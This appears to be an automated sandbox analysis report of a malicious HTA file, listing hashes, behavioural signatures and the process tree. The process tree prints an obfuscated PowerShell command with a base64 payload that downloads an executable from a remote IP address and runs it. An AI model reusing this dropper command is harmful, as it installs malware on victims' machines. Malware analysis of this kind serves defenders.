Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14-11-2024 02:28
Static task
static1
Behavioral task
behavioral1
Sample
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
Resource
win10v2004-20241007-en
General
-
Target
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
-
Size
207KB
-
MD5
fcd22700962f05502dfd476b9fd35c11
-
SHA1
f338e2af10c4e6e35d7f8f6e3613516150aeea71
-
SHA256
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
-
SHA512
8a2ff6c978fcb10971638458887c0794d42ac8c3cd3ad5f56644dc639d4a8bfaf6bc1bb70c23006184ef285e545dbaa5b90621a6669dc58681af62a9b0a6dc19
-
SSDEEP
96:43F97f45Ln2rlmc265Ln2glmccBaPrKwPjTQxZ5LnI5LnCiFlmcW65Ln2OQ:43F1f8wlz2yflzRgrsCiFlzWybQ
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
POwersHeLl.ExEflow pid Process 4 1688 POwersHeLl.ExE 5 1688 POwersHeLl.ExE -
Evasion via Device Credential Deployment 2 IoCs
Processes:
POwersHeLl.ExEpowershell.exepid Process 1688 POwersHeLl.ExE 2804 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.exePOwersHeLl.ExEpowershell.execsc.execvtres.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POwersHeLl.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
POwersHeLl.ExEpowershell.exepid Process 1688 POwersHeLl.ExE 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
POwersHeLl.ExEpowershell.exedescription pid Process Token: SeDebugPrivilege 1688 POwersHeLl.ExE Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
mshta.exePOwersHeLl.ExEcsc.exedescription pid Process procid_target PID 2516 wrote to memory of 1688 2516 mshta.exe 30 PID 2516 wrote to memory of 1688 2516 mshta.exe 30 PID 2516 wrote to memory of 1688 2516 mshta.exe 30 PID 2516 wrote to memory of 1688 2516 mshta.exe 30 PID 1688 wrote to memory of 2804 1688 POwersHeLl.ExE 32 PID 1688 wrote to memory of 2804 1688 POwersHeLl.ExE 32 PID 1688 wrote to memory of 2804 1688 POwersHeLl.ExE 32 PID 1688 wrote to memory of 2804 1688 POwersHeLl.ExE 32 PID 1688 wrote to memory of 2872 1688 POwersHeLl.ExE 33 PID 1688 wrote to memory of 2872 1688 POwersHeLl.ExE 33 PID 1688 wrote to memory of 2872 1688 POwersHeLl.ExE 33 PID 1688 wrote to memory of 2872 1688 POwersHeLl.ExE 33 PID 2872 wrote to memory of 2860 2872 csc.exe 34 PID 2872 wrote to memory of 2860 2872 csc.exe 34 PID 2872 wrote to memory of 2860 2872 csc.exe 34 PID 2872 wrote to memory of 2860 2872 csc.exe 34
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2860
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD578ba4ba9e5cd4d1450123b290bb33f7b
SHA1a345efa2b3a9a661451bdcd73fa957216475a0d9
SHA256a95e272886f38db936882deb9994674cc2a43a07d8a80bb92012fa916e36fd77
SHA5125741f1538d57a7399f053e387974fcbbfe4ce2f2854659dd9164cc610f07791678233c304751bb7bc3ffa46b1e4d607469e5943d837ddcac2a9b2f50dbf659e0
-
Filesize
3KB
MD53218f868f336ca301438aeb48e571988
SHA155c770ae3601d5c090fef1d74f3bc8fade78d343
SHA256227bcaafdd1ee0187da1546b91d8fcfbd30ec783757c5121d98c2455e0001fcc
SHA51200155c6ba172374c16ca5d05b3e9b082c91f3a8f264bcef8b90c21f20a837caf77a545de4cd3605d723f8a647b901b0959818ce846eb4f64d587bce326b37d0c
-
Filesize
7KB
MD5943f5fe78cba3be93ead28a8da5ba683
SHA1a3cf7fe11d10fee595d7ebf1f5648ee18db07c7b
SHA256b95ff72fb9f74ee921d909d6152b9b3cdce12b4d4b460c90af4ca7b644dbbaa9
SHA512fc907e54b6c4ce0a25219fc29e6e3f8ce3c2a1ef119d646762523f591b1203a411ea2de46d9f00827169fe7a09fad176618831a9dc04fc8546fccdef84935a7f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50e0ce348f6ba941e618f1f455f29bea6
SHA19ba4c3c056c3e0c5997fd8eda7812d1b1a353324
SHA25606242b3b804c45f717ffc02587d79a5cb14a98cb8baa625601f31fdaab3c1b35
SHA5122af0e2e84d46fda69b4fb3bafebff13473f15199c943f1d93f9c08f901af18cb03f44e0f1f7b4f333d465e6e000b5fc4134d5a29e58fe671be5ad9451f4c27b0
-
Filesize
652B
MD5a39953edc790fd3c055982264d45ebd9
SHA1030b6c5c9f542e7a2c11e31e6f6cd192fe625d28
SHA25673e60fa13a32189fc6acb4f43438c43bea75ab6c954610c83a0e03adb8f5498b
SHA51221f55a0a46f8326aaba23334a6693dd0bea8547156fdab2b350958d670d00b47ab8a834f1beef1aece6b4eab761032efab633ded776481f038cb8cde29f9192d
-
Filesize
473B
MD54af98cbe7b888e1e92e1aa8a35732223
SHA175d54c91355c97fc9b1c3453efea5dccd817ed42
SHA256596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
SHA5121127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3
-
Filesize
309B
MD539436a3ec2a28845767ca16383e33bd1
SHA15003dd9e8157d5f18e1610fcfb89da7f0e5b6b27
SHA256805a6e724b1d941e225b313dfaec1a58cf13ede9db57896dc4acfefca1731992
SHA512eff698496ff9504ddff80e7d87415ae24cf3d3888165f5bf01aa0390285db7f84450dd55a833d0ae04b3d686b04578eb340cd23da5e3931d297ddda775be7097